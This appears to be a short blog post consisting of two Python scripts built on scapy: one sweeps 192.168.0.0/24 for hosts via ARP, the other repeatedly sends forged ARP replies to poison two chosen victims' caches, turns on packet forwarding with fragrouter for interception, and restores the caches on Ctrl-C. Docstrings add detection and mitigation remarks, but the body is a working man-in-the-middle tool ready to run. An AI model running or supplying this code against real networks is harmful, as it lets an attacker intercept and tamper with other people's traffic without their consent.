
ARP Spoofing

by 비니화이팅 2020. 2. 24.

<scan.py>
from scapy.all import *
import threading
import os
 
# Shared scan state. The sendARP worker threads write to it; scanHosts reads it.
threads = []                     # every Thread object started by scanHosts
threadLock = threading.Lock()    # held while num and host_list are updated
num = 0                          # index given to the most recently recorded host
host_list = dict()               # index -> (ip, mac) of each host that answered
 
def printHosts(host_list):
    """Print the discovered hosts as a fixed-width NUM / IP / MAC table.

    Args:
        host_list: dict mapping a row number to an ``(ip, mac)`` pair.
    """
    rule = '---------------------------------------------------------------'
    row_format = "%d           %s                      %s"

    print('-------------------------- HOST LIST --------------------------')
    print('NUM         IP                               MAC')
    print(rule)
    for index, (ip, mac) in host_list.items():
        print(row_format % (index, ip, mac))
    print(rule)
 
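def sendARP(ip):
    """Broadcast one ARP request for *ip* and record every host that answers.

    Runs as a worker thread of scanHosts. Each answer is stored in the shared
    ``host_list`` as ``index -> (ip, source MAC of the reply frame)``.

    Args:
        ip: IPv4 address (string) to probe.

    Detection note: a sweep built from this function appears on the segment
    as a burst of broadcast ARP requests from one source MAC for consecutive
    addresses, a pattern that ARP monitoring can flag.
    """
    global num
    # Fix: the Ether(...) call was missing its closing parenthesis, so the
    # module did not parse at all.
    request = Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=ip)
    answered, _unanswered = srp(request, timeout=5, retry=1)
    for _sent, reply in answered:
        # The with-block releases the lock even if recording the reply raises.
        with threadLock:
            num += 1
            host_list[num] = (ip, reply.sprintf('%Ether.src%'))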
 
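def scanHosts():
    """Probe 192.168.0.1-192.168.0.254 with ARP and return the hosts that answered.

    One sendARP thread is started per address. Once all of them have
    finished, the terminal is cleared and the result table is printed.

    Returns:
        The shared ``host_list`` dict mapping index -> (ip, mac).
    """
    # NOTE: host_list, num and threads are module globals that are never
    # reset, so a second call appends to the results of the first.

    # Fix: range(1256) produced last octets up to 1255 (invalid addresses)
    # and started 1256 threads. The host octets of a /24 are 1..254.
    for last_octet in range(1, 255):
        ip = "192.168.0.%d" % last_octet
        worker = threading.Thread(target=sendARP, args=(ip,))
        worker.start()
        threads.append(worker)

    # Wait for every probe to finish before reporting.
    for worker in threads:
        worker.join()

    os.system('clear')
    printHosts(host_list)
    return host_list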


<arp_spoofing.py>

from scan import *
from scapy.all import *
import os
 
def arpSpoof(vic1_ip, vic1_mac, vic2_ip, vic2_mac):
    """Send two unsolicited ARP replies, one claiming each of the two IP addresses.

    Neither packet sets ``hwsrc``, so the sender hardware address is left at
    scapy's default (the sending interface's own MAC).

    Args:
        vic1_ip: IP claimed as sender in the first reply, target of the second.
        vic1_mac: accepted but not referenced in the body.
        vic2_ip: IP claimed as sender in the second reply, target of the first.
        vic2_mac: used as ``hwdst`` in both replies.

    Detection and mitigation: a host receiving these packets sees a
    neighbour's IP-to-MAC mapping change without having asked for it, and the
    same MAC ends up claiming two different IPs. Monitoring for such changes
    (arpwatch-style tools), Dynamic ARP Inspection backed by DHCP snooping on
    the switch, and static ARP entries for critical hosts such as the gateway
    are the usual controls.
    """
    # op=2 is an ARP reply ("is-at"); it is sent without a preceding request.
    arp1=ARP(op=2, psrc=vic1_ip, pdst=vic2_ip, hwdst=vic2_mac)
    arp2=ARP(op=2, psrc=vic2_ip, pdst=vic1_ip, hwdst=vic2_mac)
    send(arp1)
    send(arp2)
 
def restoreARP(vic1_ip, vic1_mac, vic2_ip, vic2_mac):
    """Send ARP replies that carry each host's own IP/MAC pair, three times each.

    Here ``hwsrc`` is set explicitly, so each reply advertises the pairing
    that was recorded for that host during the scan.

    Args:
        vic1_ip: IP address of the first host.
        vic1_mac: MAC address advertised for ``vic1_ip``.
        vic2_ip: IP address of the second host.
        vic2_mac: MAC address advertised for ``vic2_ip``.

    Incident-response note: a cache only returns to the correct value if the
    receiving host accepts these replies. After an ARP poisoning event,
    check the neighbour tables on the affected hosts directly rather than
    assuming they were restored.
    """
    # The ARP target-hardware field is the broadcast address; link-layer
    # addressing is left to scapy's send().
    arp1=ARP(op=2, psrc=vic1_ip, hwsrc=vic1_mac, pdst=vic2_ip, hwdst='ff:ff:ff:ff:ff:ff')
    arp2=ARP(op=2, psrc=vic2_ip, hwsrc=vic2_mac, pdst=vic1_ip, hwdst='ff:ff:ff:ff:ff:ff')
    # count=3 sends each reply three times.
    send(arp1, count=3)
    send(arp2, count=3)
 
def main():
    """Run the scan, read two host indices, then call arpSpoof until Ctrl-C.

    The two answers are converted with ``int()`` and used as keys into the
    dict returned by scanHosts. On KeyboardInterrupt, restoreARP is called
    with the same four values.

    Raises:
        ValueError: if an answer is not an integer.
        KeyError: if an answer is not an index present in the scan result.

    Detection note: the loop has no delay between iterations, so the sending
    host emits ARP replies continuously. An ARP reply rate from one MAC that
    is far above the segment's baseline is a strong indicator, in addition to
    the changed IP-to-MAC mappings themselves.
    """
    host_list=scanHosts()
    victim1=input("Victim 1 : ")
    victim2=input("Victim 2 : ")

    print("ARP Spoofing START")

    # Shells out to the external fragrouter tool; presumably B1 is its plain
    # IP-forwarding mode (TODO confirm against the fragrouter documentation).
    os.system("fragrouter -B1")
    try:
        while True:
            arpSpoof(host_list[int(victim1)][0], host_list[int(victim1)][1], host_list[int(victim2)][0], host_list[int(victim2)][1])
    except KeyboardInterrupt:
        # Ctrl-C ends the loop; the recorded IP/MAC pairs are re-advertised.
        restoreARP(host_list[int(victim1)][0], host_list[int(victim1)][1], host_list[int(victim2)][0], host_list[int(victim2)][1])
        print("ARP Spoofing END")
 
# Start main() only when the file is executed as a script, not on import.
if __name__ == "__main__":
    main()
 

